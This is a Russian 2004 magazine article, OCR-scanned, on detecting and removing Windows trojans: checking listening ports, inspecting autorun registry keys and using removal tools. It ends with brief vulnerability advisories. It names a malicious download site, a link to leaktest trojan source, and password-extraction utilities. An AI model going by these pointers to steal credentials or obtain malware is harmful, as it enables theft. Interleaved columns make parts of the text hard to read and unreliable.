Safety Monitor.
Если коротко описать процесс поиска программы, вы-
полняющей нежелательные действия, то алгоритм обычно
такой:
! Обновить базу данных установленного на вашем ком-
пьютере антивируса и проверить им все локальные дис-
ки. (Если антивируса нет, то установить его.) Вам нуж-
но осознавать, что если антивирус не обнаружил троя-
нов, то это не значит, что их у вас нет. На компьютере
может работать свежий троян или специально подготов-
ленная для вас программа-шпион, которой еще нет в
базах ни одной компании производителя антивируса. И,
возможно, вы тот человек, который первым выявит и
пошлет эту программу для исследования в антивирус-
ную компанию.
! Посмотреть, какие процессы работают на компьютере
и какие соединения с Интернетом ими используются.
Возможно, на диске появились новые файлы, возмож-
но, старые файлы изменились. Возможно, в реестре по-
явились новые ключи или параметры.
68
конкурсная статья
ДЕНИС БАТРАНКОВ
! Просмотреть логи персонального firewall. Если firewall
не смог заблокировать несанкционированные соедине-
ния трояна в силу своей недостаточной функциональ-
ности или неправильной настройки, то есть надежда,
что он хотя бы запротоколировал, какие соединения
были пропущены в Интернет. Если хорошего персональ-
ного firewall нет, то хотя бы включите встроенный в
Windows XP firewall, который называется ICF (как это сде-
лать, описано на http://www.microsoft.com/rus/windowsxp/
using/howto/networking/icf.asp). Протоколы встроенного
firewall можно посмотреть с помощью любого текстово-
го редактора, открыв файл C:\WINDOWS\ pfirewall.log.
Но лучше использовать более удобные утилиты, ссыл-
ки на которые легко найти при помощи Google (напри-
мер, набрав в строке поиска «XP firewall logger»).
Первый пункт достаточно понятен и помогает в 80% слу-
чаев. За третий пункт нужно браться в самом запущенном
случае и еще лучше со специалистом по компьютерной бе-
зопасности (далее КБ). Давайте попробуем выполнить дей-
ствия, описанные во втором пункте. Тем более что при вни-
мательном выполнении всех операций можно найти и убить
любую гадость, засевшую в вашем компьютере.
Возникает вопрос, нужно ли отключаться от Интернета,
если мы ищем вирус или троян? Вам понадобятся различ-
ные утилиты для поиска трояна (какие конкретно будет опи-
сано далее). Если эти утилиты уже есть или на жестком
диске, или на компакт-диске, или у вас есть возможность
сходить за нужными дисками, или скачать и записать на
компакт-диск нужные программы на другом незараженном
компьютере, то необходимо отключиться от Сети. Это нуж-
но сделать, чтобы предотвратить дальнейшую утечку ин-
формации с компьютера. Отключаться нужно даже от ло-
кальной сети, например, сети офиса или домашней сети,
чтобы не заражать соседние компьютеры.
Однако иногда встречаются особо запущенные случаи,
 безопасность
в которых приходится скачивать нужные программы через вашем компьютере все что угодно: скачивать файлы, рас-
Интернет. Например, я однажды приехал в гости к родствен- сылать спам, быть прокси-сервером, участвовать в DOS-
никам в Сибирь, обрадовался наличию компьютера с мо- атаке, быть плацдармом для других атак, естественно, в
демным доступом к Интернету, сел за него и, нажав по при- рамках функций, предоставляемых им имеющейся опера-
вычке <Ctrl-Alt-Del>, сразу обнаружил трояна в списке про- ционной системой. В данном случае мы рассматриваем
цессов. Поскольку нужных программ под рукой не было, версии Windows: 2000 SP4, XP SP1, 2003.
пришлось лечить вручную. Единственной «защитой» этого Такие программы открывают TCP-порт на компьютере
компьютера с Windows XP был гордо стоящий антивирус с жертвы, устанавливают его в состояние LISTENING и ждут,
базами вирусов двухгодичной давности. В Windows даже когда хакер подключится на этот порт. Таким образом, нам
не был включен ICF. нужно выявить все процессы, которые открыли TCP-порты и
К сожалению, подавляющее большинство пользовате- которые находятся в состоянии LISTENING, и решить, одоб-
лей неопытны и несведущи в вопросах компьютерной бе- ряете ли вы это соединение или нет. То же самое можно ска-
зопасности. Компьютеры на платформе Intel и операцион- зать про UDP-порты – за ними тоже надо смотреть, с един-
ная система Windows являются высокотехнологичными про- ственным отличием, что у них нет состояний – с этих пор-
дуктами. Ведь даже среди тех, кто пользуется общеизвест- тов может как приниматься информация, так и отсылаться.
ной программой Microsoft Word, не так много людей, кто С ходу можно сказать, что если у вас обычный компьютер,
изучал его на курсах или хотя бы читал к нему документа- подключенный к выделенной линии или через модем в Ин-
цию. Что тут говорить про образованность в области ком- тернет, то в идеале у вас не дожно быть слушающих портов.
пьютерной безопасности. Даже если приложения или сервисы Windows открыли эти
К каждому пользователю специалиста по компьютер- порты, то они должны быть закрыты персональным firewall.
ной безопасности не приставишь. Поэтому на таких компь- Чтобы выявить программы, которые ожидают (и уста-
ютерах все подготовительные мероприятия их владельцы навливают) соединения в Windows XP и Windows 2003, мож-
будут делать сами при работающем трояне и подключен- но, конечно, воспользоваться стандартной утилитой netstat
ном Интернете, поскольку Интернет – единственное место, c параметрами -ano. (Параметр -а заставляет netstat пока-
где они могут найти помощь и программное обеспечение зывать все имеющиеся подключения и ожидающие порты,
для поиска троянов. Тем более чего им бояться – все важ- -n преобразует вывод адресов и портов в числовой формат,
ное троян уже наверняка украл и отослал своему владель- -o отображает для каждого подключения идентификатор
цу. Но даже в этом случае, после того как вы скачали все процесса, создавшего это подключение). В Windows 2000
необходимые утилиты на локальный диск, нужно отключить- ключ -o еще не был изобретен. Например:
ся от Сети.
C:\Documents and Settings\User>netstat -ano
Итак, боевая задача состоит в том, чтобы успешно прой-
ти три этапа: найти трояна, убить его и поменять свои укра- Активные подключения
денные пароли. Именно в такой последовательности. Имя Локальный адрес Внешний адрес Состояние PID
Замечание: программа в операционной системе Windows TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 856
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
представлена в виде процесса, в котором может работать TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 1028
несколько нитей, и все эти нити загружены в память из TCP 0.0.0.0:4928 0.0.0.0:0 LISTENING 3660
TCP 0.0.0.0:4929 0.0.0.0:0 LISTENING 3660
файлов, хранящихся на диске. Как правило, это файлы с TCP 0.0.0.0:4946 0.0.0.0:0 LISTENING 3660
расширением EXE и DLL. Расширения могут быть и други- TCP 0.0.0.0:6213 0.0.0.0:0 LISTENING 3660
TCP 0.0.0.0:6218 0.0.0.0:0 LISTENING 3660
ми. Злоумышленники часто используют другие расшире- TCP 0.0.0.0:6247 0.0.0.0:0 LISTENING 3660
ния, чтобы никто не догадался. TCP 0.0.0.0:6253 0.0.0.0:0 LISTENING 3660
TCP 0.0.0.0:6299 0.0.0.0:0 LISTENING 3660
Некоторыми проявлениями троянских программ явля- TCP 0.0.0.0:6344 0.0.0.0:0 LISTENING 3660
ются: TCP 0.0.0.0:9762 0.0.0.0:0 LISTENING 2324
! несанкционированные соединения c различными хоста- TCP
TCP
0.0.0.0:10641
0.0.0.0:10676
0.0.0.0:0
0.0.0.0:0
LISTENING
LISTENING
2884
2324
ми в Интернете; TCP 0.0.0.0:10892 0.0.0.0:0 LISTENING 2324
! открытые программами соединения, ожидающие под- TCP
TCP
127.0.0.1:111
127.0.0.1:143
0.0.0.0:0
0.0.0.0:0
LISTENING
LISTENING
2676
2676
ключения извне; TCP 127.0.0.1:3044 0.0.0.0:0 LISTENING 1608
! попытка открыть ненужные для нормальной деятельно- TCP
TCP
127.0.0.1:3045
127.0.0.1:3046
0.0.0.0:0
0.0.0.0:0
LISTENING
LISTENING
1028
1028
сти файлы на локальном диске; TCP 127.0.0.1:3085 0.0.0.0:0 LISTENING 2324
! добавление себя в списки автозапуска; TCP
TCP
127.0.0.1:5335
127.0.0.1:8888
0.0.0.0:0
0.0.0.0:0
LISTENING
LISTENING
3232
3232
! маскировка под стандартные системные процессы и раз-
мещение в системной папке Windows. Результат, как видите, аскетичен: порты, конечно, вы-
водятся, но вместо информации о приложениях выдается
Находим троянскую программу, только номер процесса. Хотелось бы еще узнать имя про-
которая ждет входящего соединения цесса и местоположение файла, из которого он был запу-
Обычно авторы таких программ называют свои програм- щен. Но давайте хотя бы разберемся с тем, что уже есть.
мы «программами удаленного управления». Типичной ил- Если вы увидели у себя много TCP-соединений в состо-
люстрацией этого вида троянских программ является Back янии LISTENING, то не пугайтесь – это, скорее всего, не
Orifice (см. описание http://www.viruslist.com/viruslist.html?id= трояны, а работающие по умолчанию стандартные серви-
3957&gloss=8227). Такие программы позволяют делать на сы Windows.

№10(23), октябрь 2004 69

 безопасность
Алгоритм просмотра ожидающих соединений такой:
! Отметаем все соединения, у которых локальный адрес
установлен 127.0.0.1 – это означает, что к этим портам
может подключиться только программа, запущенная на
этом же компьютере. Подключение извне к этому порту
и адресу невозможно.
! Адрес 0.0.0.0 означает, что любое подключение по лю-
бому IP-адресу, который есть на вашем компьютере, с
любого хоста Интернета будет возможно на указанный
порт. Напомню, что на одной сетевой карте может быть
несколько IP-адресов. Не говоря уже о том, что у вас
может быть и несколько сетевых карт.
! В некоторых ожидающих соединениях вы увидите те, у
которых явно указан IP-адрес одной из ваших сетевых
карт. К ним также возможно подключиться из Интерне-
та через указанный порт.
Получается, что для всех ожидающих соединений из
последних двух пунктов нам нужно узнать, какое приложе-
ние создало это подключение, и нужно ли это вам.
Следующим этапом является установление имени при-
ложения, использующего это соединение. Очевидно, ре-
зультат команды netstat -ano в виде идентификатора про-
цесса нас не устраивает, поскольку, пользуясь стандарт-
ными средствами графического интерфейса и командной
строки Windows, невозможно получить по номеру процес-
са его имя и тем более имя исполняемого файла. Конечно,
можно самому написать программу, которая выполняет та-
кие действия, но, к счастью, в Сети уже есть приложения,
которые делают то, что нам нужно.
Тем более что в статье Microsoft Knowledge Base Article –
816944 (http://support.microsoft.com/default.aspx?scid=kb;en-
us;816944) сами сотрудники фирмы Microsoft советуют
пользоваться такими программами, как TCPView (http://
www.sysinternals.com/ntw2k/source/tcpview.shtml) и FPort
(http://www.foundstone.com/knowledge/proddesc/fport.html).
Я, однако, советую другую программу, которая называ-
ется CurrPorts (http://freehost14.websamba.com/nirsoft/utils/
cports.html). FPorts плох тем, что работает только в команд-
ной строке и ничего не умеет, кроме показа имени процес-
са и открытых им портов. TCPView – отличная программа,
позволяет закрыть соединение и убить процесс, но CurrPorts
более функциональна: ко всему перечисленному выводит
больше информации о процессе, показывает соответству-
Ðèñóíîê 2
70
ющие процессу сервисы, позволяет делать HTML-отчеты.
Все эти программы бесплатны.
Замечание: на самом деле для просмотра процессов и
их идентификаторов можно воспользоваться программой
tlist.exe из файла support.cab, лежащего на каждом лицен-
зионном диске Windows. К сожалению, эта программа не
устанавливается по умолчанию.
Сравните TCPView и CurrPorts (рис. 1 и рис. 2).
Ðèñóíîê 1
CurrPort может с промежутками в 2 секунды показывать
программы, использующие открытые порты (лучше сказать,
сокеты). К сожалению, соединения происходят достаточно
быстро и практически невозможно отследить все соедине-
ния в реальном времени. Для выявления несанкциониро-
ванных подключений нужно протоколировать все соедине-
ния и потом просматривать полученные записи.
Отлично, берем CurrPorts, получаем список процессов,
которые что-то слушают во внешнем мире или даже соеди-
няются с внешним миром.
Что дальше? Ведь получается, что вам нужно хорошо
знать свой компьютер, а точнее, что за программы вы уста-
новили и как они называются, да еще понимать, что про-
грамма c:\windows\system32\svchost.exe – системная про-
грамма Windows (см. описание http://www.liutilities.com/
products/wintaskspro/processlibrary/svchost), а например,
c:\windows\svchost.exe – уже непонятно откуда взявшаяся
программа под этим именем (например, это может быть
вирус, см. описание здесь: http://us.mcafee.com/virusInfo/
default.asp?id=description&virus_k=100277). Просто хакер

скрыл под именем системного файла свою программу и
положил ее в системную папку.
Итак, что делать, если вы нашли незнакомый процесс?
Есть такая услуга: идентификация процесса по имени. Су-
ществуют сайты, на которых выложен список процессов,
чаще всего встречающихся в операционной системе
Windows. Таким образом, по имени процесса вы можете
понять, для чего он нужен на вашем компьютере, какие пор-
ты он обычно использует, и сравнить с данными CurrPorts.
Например, http://www.liutilities.com/products/wintaskspro/
processlibrary. Для примера попробуйте посмотреть описа-
ние svchost.exe: http://www.neuber.com/taskmanager/process/
svchost.exe.html. Кроме того, можно набрать в поисковой
машине имя процесса и номер порта – вероятнее всего, вы
найдете место, где описывается этот процесс или где опи-
сывается этот вирус или троян. Но лучше всего купить со-
ответствующие продукты, которые помогут вам идентифи-
цировать процессы без подключения к Интернету: например,
WinTasks Pro (http://www.liutilities.com/products/wintaskspro)
или Security Task Manager (http://www.neuber.com/task
manager/index.html).
Таким образом, вы, пользуясь маленькой утилитой, на-
шли процессы, которые зачем-то слушают порты, и при по-
мощи Интернета поняли, что это за процессы и нужно ли
их удалять с диска. Если вы не уверены точно, что за про-
цесс работает на вашем компьютере, обращайтесь к спе-
циалистам. Их можно найти в форумах, например, на
www.securitylab.ru/forum.
Необходимо понимать, что многие трояны прячутся под
именами системных процессов, чтобы их невозможно было
убить из менеджера задач. Но CurrPorts благополучно уби-
вает и системные процессы. Будьте осторожнее – умира-
ние системного процесса может привести к зависанию или
перезагрузке компьютера.
Ðèñóíîê 4
№10(23), октябрь 2004
безопасность
Другим вариантом такого ручного поиска процесса яв-
ляется просмотр всех процессов с помощью последней вер-
сии программы Sysinternals Process Explorer (http://www.sys
internals.com/ntw2k/freeware/procexp.shtml) (рис. 4).
Одной из полезных функций данной программы явля-
ется просмотр свойств каждого процесса, где показаны
используемые этим процессом порты. Например, операци-
онная система использует:
Ðèñóíîê 3
Открытый слушающий порт 445 означает, что система
может предоставлять доступ к дискам посредством прото-
кола SMB (Server Message Broadcast), также известного под
названием CIFS (Common Internet File System) через Интер-
нет. Неправильное конфигурирование этого сервиса может
привести к возможности чтения системных и других фай-
лов третьими лицами и захвату контроля над системой.
Значительное количество пользователей открывают ло-
кальные диски для чтения и записи по сети для упрощения
обмена информацией, давая также возможность и третьим
лицам работать с их системами. Если вы не хотите, чтобы
кто-то изучал ваши диски или даже вносил изменения в
данные, хранящиеся на них, то лучше отключить этот сер-
71
 безопасность
вис совсем. За 445 порт отвечает драйвер netbt.sys, поэто-
му есть два способа избавиться от него:
! отключить драйвер netbt.sys через «Диспетчер уст-
ройств», но тогда не будет работать DHCP-клиент
Windows, что часто необходимо абонентам Интернета,
использующим выделенные линии;
! переименовать в ветке реестра HKEY_LOCAL_MACHINE\
SYSTEM\CurrentControlSet\Services\NetBT\Parameters па-
раметр TransportBindName (например, на OldTransport
BindName), и после перезагрузки UDP- и TCP-порты бу-
дут отключены.
Если у вас внешний IP-адрес, то это нелишне сделать,
поскольку по статистике 445 и 135 порты чаще всего ска-
нируют в Интернете (см. статистику http://isc.sans.org/
top10.php). Без преувеличения можно сказать, что каждый
компьютер во внешней сети подвергается постоянным по-
пыткам соединения с TCP-портами 445 и 135, рассчитывая
на то, что пользователи оставили открытым анонимный
доступ (null сессию). 135 порт (NETBIOS) отключается в
свойствах протокола TCP/IP в свойствах сетевой карты. От-
крытый порт 1026 говорит о том, что включена «Служба
сообщений» (Messenger). Если вы ей не пользуетесь, то от-
ключите этот сервис. Для этого запустите консоль управле-
ния сервисами Windows (services.msc), кликните правой кноп-
кой на «Службе сообщений», выберите «Свойства» и в поле
«Тип запуска» выберите «Отключено» и нажмите «OK».
И так далее по шагам для каждой программы нужно
изучить, что за порты она использует, зачем они ей нужны
и желаете ли вы, чтобы она передавала куда-то данные.
Находим программу, производящую
несанкционированные соединения
с Интернетом
В этой части нам нужно распознать программу, которая,
попав на компьютер, считывает нужные ей данные (напри-
мер, ваши пароли) и отсылает их куда-то в Интернет. По-
скольку ваши важные данные достаточно небольшого объе-
ма: учетные записи, пароли, адреса почтовых ящиков, те-
лефоны dial-up, то передать все это можно очень быстро,
особенно если упаковать. Естественно, что все это хранит-
ся на диске и все это можно прочитать и посмотреть. По-
смотрите хотя бы утилиты MessenPass (http://www.nirsoft.net/
utils/mspass.html) или Protected Storage PassView (http://
www.nirsoft.net/utils/pspv.html). Первая утилита покажет па-
роли из любого мессенджера (ICQ, MSN, Trillian и т. д), вто-
рая – из Explorer и Outlook.
Очевидно, что некоторые процессы соединяются с Ин-
тернетом на короткое время и нам очень сложно сидеть весь
день за программой CurrPorts и следить, кто именно соеди-
няется с Интернетом. Вдобавок, это может быть бесполез-
ным, поскольку некоторые троянские программы соединя-
ются с Интернетом не сами, а «просят» это сделать другую
легальную программу, например, Explorer. Это позволяет
им скрыться от слежения и вдобавок обмануть ваш персо-
нальный firewall. Например, я уверен, что у вас он пропус-
кает все исходящие соединения Explorer.exe на любой ад-
рес по 80 порту. (Если firewall вообще у вас стоит.) Поскольку
Internet Explorer экспортирует функции, которыми может
72
пользоваться любое стороннее приложение, то троян мо-
жет от имени Internet Explorer зайти на сайт, созданный спе-
циально для него (например, недавно ставший известным
maybeyes.biz), и как параметры строки передаст ваши ло-
гины и пароли или скачает свои дополнительные модули.
Если хорошо поискать, то можно даже найти исходный текст
подобной программы: tooleaky.zensoft.com/tooleaky.zip. Эта
программа использует WinExec() для запуска Explorer.
Замечание: сайт maybeyes.biz создан специально для
того, чтобы троян Ducky загрузил с этого сайта свою основ-
ную часть. Этот троян использует последнюю уязвимость в
Windows XP SP1 и Windows 2003, которая позволяет ему
загрузиться на ваш компьютер, пока вы просматриваете
JPEG(JPG)-картинку. Подробное описание этой уязвимости
на сайте Microsoft: MS04-028 (http://www.microsoft.com/
technet/security/bulletin/MS04-028.mspx). Обновление, ис-
правляющее эту уязвимость, доступно на сайте Microsoft.
Бороться с таким видом троянов трудно. Персональные
firewall не всегда помогают. А точнее, вообще не помогают.
В этом можно убедиться, посмотрев список персональных
firewall, прошедших leaktests (http://www.firewallleaktester.com/
tests.htm). Leaktest – класс программ, реализующий один
из видов утечки информации в обход персонального firewall.
Как видно, пока нет идеального firewall, блокирующего все
leaktests. Пока в лидерах Look’n’stop, но он тоже ловит не
все. К сожалению, чтобы грамотно настроить персональ-
ный firewall, нужно обладать как минимум знаниями стека
протоколов TCP/IP, представлять, как работает операцион-
ная система Windows, и быть знакомым с функциональны-
ми возможностями конкретного firewall. Но это тоже не все-
гда помогает, потому как злоумышленники постоянно ищут
(и находят) новые методы обхода firewall. Профессионалы
на основе накопленного опыта могут закрыть лазейки в опе-
рационной системе, которые уже известны. Но что хакеры
придумают завтра – никому неизвестно. Поэтому выбора
нет и придется повышать свою грамотность в отношении
безопасности. Конечно, с ходу профессионалом в этой об-
ласти стать сложно, но существенно затруднить нехорошим
людям выполнение их замыслов вполне возможно.
Существует бесчисленное количество способов попа-
дания трояна на ваш компьютер. Вы можете сами скачать
его из Интернета, как «очень интересную программу, кото-
рую вы обязательно должны посмотреть», эта программа
может прийти вам по электронной почте как «обновление
безопасности от Microsoft». Кроме того, вам может послать
специально или не специально зараженную программу ваш
знакомый по ICQ или MSN, вы можете принести троян или
вирус на дискете или компакт-диске. Не стоит думать, что
на компакт-дисках не бывает вирусов и троянов. Я видел,
как люди параноидально проверяют чистые дискеты из ко-
робки на вирусы, но очень редко встречался с тем, что люди
проверяют антивирусом свежекупленные компакт-диски с
программным обеспечением или играми. Я видел однаж-
ды подобный компакт-диск. На нем была записана компь-
ютерная игра и в довесок вирус.
Кроме того, существовало и существует огромное ко-
личество дырок в Windows и приложениях под Windows,
которые распространяются без участия пользователя. Как
правило, они пользуются отсутствием в исполняемом коде

различных компонентов Windows проверок на длину вхо-
дящих данных или параметров или, короче говоря, пере-
полнением буфера. Например, известный компьютерный
червь Blaster (http://support.microsoft.com/kb/826955/RU/)
использует переполнение буфера в сервисе RPC. А вот тро-
ян Ducky уже использует ошибку в обработке JPEG-карти-
нок (переполнение буфера) для своего запуска на вашем
компьютере. Как это ни ужасно, но, просто просмотрев кар-
тинку с удаленного сайта через Explorer, вы рискуете зара-
зиться новым трояном. И неизвестно, что нас ждет завтра.
Понятно, что очень сложно предусмотреть все вариан-
ты заражения компьютера, и, более того, неизвестно, ка-
кие уязвимости Windows вирусы и трояны будут использо-
вать в будущем, поэтому надо выполнять хотя бы два про-
стых правила:
! не скачивать и не запускать неизвестные программы из
Интернета;
! включить «автоматическое обновление Windows», что-
бы вовремя устранять уязвимости.
Но если троян (или вирус) попал на ваш компьютер, то
его задача: закрепиться и остаться на компьютере как мож-
но дольше, а при возможности распространиться дальше.
Тут и проявляется ахиллесова пята этих троянов (впрочем,
как и любого другого вируса) – им нужно, чтобы их кто-то
запускал при следущей загрузке Windows. Если они не мо-
гут запуститься, то не могут ничего сделать. Для своего
последующего запуска они используют стандартные меха-
низмы Windows: запись в папку автозагрузки и в список
программ для автозапуска в реестре, запуск по расписа-
нию, установка как сервис, запись в system.ini и win.ini. Как
правило, такие трояны не используют вирусную техноло-
гию внедрения непосредственно в сам исполняемый файл,
а идут отдельным модулем в виде exe- или dll-файла.
Наша задача свелась к тому, чтобы «поскрести по сусе-
кам» и выявить все процессы, что у нас есть в автозапуске,
и опять посмотреть, нужны ли они нам там. Программы, ко-
торые помогают это делать, уже написаны. Windows нам
предлагает утилиту msconfig.exe, с помощью которой мож-
но посмотреть INI-файлы, сервисы и автозагрузку (рис. 5).
Однако лучшим стандартным средством Windows для
просмотра автоматически загружаемых программ являет-
ся msinfo32.exe (можно запустить через меню Пуск → Про-
граммы → Служебные → Сведения о системе) (рис. 6).
Ðèñóíîê 6
№10(23), октябрь 2004
безопасность
Ðèñóíîê 5
Здесь вы увидите более полный список, поскольку по-
лучен он из гораздо большего количества укромных мест
Windows. Но, к сожалению, отредактировать его эта про-
грамма не позволяет.
Ну и последний вариант – это просмотреть реестр
Windows, используя утилиту regedit.exe. Например, в HKLM\
Software\Microsoft\Windows\CurrentVersion\Run очень много
интересного.
Посмотрим, какие варианты есть у сторонних разработ-
чиков. Начну с программы Starter (http://codestuff.tripod.com/
features.shtml), которая сама читает данные из реестра и
INI-файлов и затем показывает содержимое в удобном
виде (рис. 8).
Она просматривает и показывает имена программ, ко-
торые будут автоматически выполнены. Чтобы увидеть пол-
ную картину, нужно в «Настройках» во вкладке «Разное»
поставить галочку на параметре «Элементы» только для
экспертов, и тогда имена программ она будет брать из сле-
дующих ключей реестра, папок автозагрузки и INI-файлов:
! HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run;
! HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\RunOnce;
! HKEY_CURRENT_USER\Software\Policies\Microsoft\
Windows\System\Scripts;
! HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer\Run;
! HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run;
73
 безопасность
! HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ ми DLL Injection. Я не буду заставлять вас разбираться еще и
CurrentVersion\RunOnce; в этом. Оставьте работу специалистам по безопасности.
! HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ Но эта программа показывает не все места, где может
CurrentVersion\RunOnceEx; прятаться троян. Еще нужно смотреть на встраиваемые мо-
! HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\ дули (plugins) Explorer, WinAmp, Photoshop, смотреть, какие
CurrentVersion\Winlogon; зарегистрированы ShellExtension (то, что запускается при
! HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ нажатии правой кнопки на объекте), «Назначенные зада-
CurrentVersion\ShellServiceObjectDelayLoad; ния» и наконец сервисы. Давайте попробуем другую про-
! HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\ грамму WinPatrol PLUS (http://www.winpatrol.com).
Windows\System\Scripts;
! HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\policies\Explorer\Run;
! HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\
CurrentVersion\Winlogon;
! HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\
CurrentVersion\Run;
! HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\
CurrentVersion\RunOnce;
! папка Current User\Главное меню\Программы\Автозаг-
рузка;
! папка All Users\Главное меню\Программы\Автозагрузка; Ðèñóíîê 7
! папка Default User\Главное меню\Программы\Автозаг- Программа платная, но даже в незарегистрированном
рузка; варианте она позволяет узнать много про ваш Windows.
! файл Win.ini: разделы [Windows].Run, [Windows].Load. Думаю, что самое полезное окошко в программе – это IE
Helpers, где показаны дополнительные модули, которые
Еще одной ценной особенностью этой программы явля- подгружаются при запуске Explorer.
ется то, что она показывает список процессов и подгружен- Чаще всего я использую программу Sysinternals Autoruns
ные этими процессами DLL, что позволяет бороться с атака- (http://www.sysinternals.com/ntw2k/freeware/autoruns.shtml) –

Ðèñóíîê 8

74

только она показывает ShellExtensions и другие хитрые ком-
поненты Windows (рис. 10).
Итак, мы посмотрели, что находится в автозапуске, уда-
лили ненужные программы и заодно удалили трояны, кото-
рые периодически запускаются для выполнения «нехоро-
ших» задач. Самое главное, что одновременно мы навели
порядок в Windows.
И напоследок скажу, что если троянская программа при
своем запуске удаляет себя из реестра и при завершении
Windows добавляет себя снова в реестр, то в этом случае
то, что вы читали выше, не работает. Но зато помогает кноп-
ка Reset.
Убить трояна
Что самое интересное, периодически это становится труд-
ной задачей. Что делать, если, пытаясь удалить файл, вы
сталкиваетесь с сообщениями: «Доступ к файлу запрещен»,
«Файл используется»? Удалить такие файлы можно только
специальным образом. Очевидно, удалять их нужно до того
момента, как они начали использоваться, либо убивать про-
цесс, заблокировавший файл, что не всегда возможно.
Ðèñóíîê 9
Я предлагаю скачать программу MoveOnBoot (http://
www.softwarepatch.com/software/moveonboot.html), которая
удалит по вашей просьбе файл в самом начале загрузки
Windows, когда файл еще никем не используется. После
установки программы просто кликаете правой кнопкой на
Ðèñóíîê 10
№10(23), октябрь 2004
безопасность
этом файле, в открывшемся контекстном меню выбираете
«Свойства» и в новой вкладке нажимаете кнопку Execute.
После перезагрузки этот файл будет удален (рис. 9).
Как посмотреть, что «ушло»
с вашего компьютера
Несмотря на все наши усилия (и не только наши), все рав-
но нужно констатировать факт, что если мы нашли и обез-
вредили трояна, то неизвестно, что было украдено с ком-
пьютера. Поэтому, после того как мы провели «дезинфек-
цию», нужно обязательно поменять все пароли.
Чтобы в следующий раз не производить все перечис-
ленные выше действия, давайте поставим какой-нибудь
продукт, который бы протоколировал все успешные соеди-
нения с внешним миром, чтобы потом, уже после инциден-
та, можно было понять, откуда произошла утечка.
Во-первых, приходит на ум поставить галочку «записы-
вать успешные соединения» во встроенном в Windows
firewall и периодически просматривать эти записи. Ссылки
на программы для удобного просмотра этих объемных про-
токолов легко найти с помощью любого поискового серве-
ра, например Google.
Во-вторых, неплохим бесплатным решением является на-
писанная Microsoft утилита, которая называется Port Reporter
(http://support.microsoft.com/?id=837243). Советую внима-
тельно посмотреть на нее. Эта утилита не только протоко-
лирует соединения, но и расписывает все DLL, которыми
пользовался процесс. Ну и, наконец, можно поставить лю-
бой сторонний firewall, который имеет функции протоколи-
рования соединений. Например, Agnitum Outpost (http://
www.agnitum.com/products/outpost). Но это платный способ.
Как все это автоматизировать
Здесь я хочу рассказать о программе System Safety Monitor
(http://maxcomputing.narod.ru/ssm.html?lang=ru).
Все эти операции были бы необходимы, если бы мы сво-
евременно узнавали о добавлении программ в реестр, в
автозапуск, о запуске одних программ другими програм-
мами и т. д. Опять же нашелся человек, который это авто-
матизировал (рис. 11, 12).
75
безопасность
Краткие характеристики:
! Позволяет контролировать, какие приложения могут, а
какие не могут быть запущены на вашем компьютере.
! Может запретить одному приложению запускать другое.
! Предотвращает процесс внедрения стороннего кода в
чужое приложение («Dll Injection»).
! Может предотвратить установку клавиатурных шпионов.
! Дает возможность контролировать загрузку драйверов.
! Позволяет контролировать доступ к таким объектам
ядра, как «\Device\PhysicalMemory».
! Предупреждает об изменении «охраняемого» ключа ре-
естра Windows.
! Позволяет легко редактировать список запускаемых при
загрузке компьютера приложений.
! Автоматически закрывает окна в зависимости от их за-
головка.
! Подобно меню <Ctrl+Alt+Del> может принудительно за-
вершать работу запущенных процессов (даже тех, ко-
торые в Windows 9x не видны). Ðèñóíîê 11
! Имеет легкоредактируемые списки разрешенных и зап- Эта программа опережает многие программы по функ-
рещенных приложений. «Запрещенные» приложения ав- циональности. Она дает пользователю возможность быст-
томатически закрываются при запуске. ро реагировать на событие, предоставляя подробную ин-
! Уведомляет об установке новых сервисов Windows NT формацию о том, что произошло, легко настраивается под
! Уведомляет об изменениях в заданных INI-файлах и меню нужды пользователя и позволяет следить за безопаснос-
автозапуска Windows. По умолчанию контролируется тью сразу нескольких уязвимых компонентов Windows.
win.ini и system.ini, но можно расширить этот список. Описанные в статье программы должны быть у вас все-
! Контролирует вызовы API, используемые для внедре- гда под рукой. Особенно полезными я считаю продукты
ния в чужое адресное пространство и для сокрытия про- Sysinternals. Было бы разумно скачать все необходимое про-
цессов. граммное обеспечение до появления трояна на вашем ком-
! Протоколирует события, происходящие в системе. пьютере и записать на компакт-диск.

Ðèñóíîê 12

76
 bugtraq
Удаленное выполнение произвольного
кода в Windows Server 2003
Опасность: критическая.
Описание: В Windows Server 2003 SMTP-компоненте обна-
ружена уязвимость при выполнении Domain Name System
(DNS) преобразования. Удаленный атакующий может зас-
тавить сервер обработать частичный DNS-запрос, чтобы вы-
полнить произвольный код на уязвимой системе с SYSTEM-
привилегиями. Уязвимость также существует в Microsoft
Exchange Server 2003 Routing Engine-компоненте на Microsoft
Windows 2000 Service Pack 3 или на Microsoft Windows 2000
Service Pack 4.
URL производителя: http://www.Microsoft.com.
Решение: Установите соответствующее обновление.
Удаленное выполнение произвольного
кода в Microsoft Windows XP/2003
Опасность: критическая.
Описание: В Microsoft Windows XP/2003 обнаружено перепол-
нение буфера в сжатых (zipped) папках при обработке спе-
циально сформированных сжатых файлов. Удаленный ата-
кующий может сконструировать специально обработанный
сжатый файл, чтобы выполнить произвольный код на сис-
теме пользователя, посетившего злонамеренный веб-сайт.
URL производителя: http://www.Microsoft.com.
Решение: Установите соответствующее обновление.
Удаленный отказ
в обслуживании в Apache
Программа: Apache до версии 2.0.51.
Опасность: средняя.
Описание: Уязвимость обнаружена в Apache web server в
обработке IPv6-адресов.
Удаленный пользователь может представить параметр
отрицательной длины, который приведет к ошибке сегмен-
тации. Уязвимость расположена в apr-util/test/testuri.c и apr-
util/uri/apr_uri.c.
URL производителя: http://httpd.apache.org.
Решение: Установите обновленную версию программы:
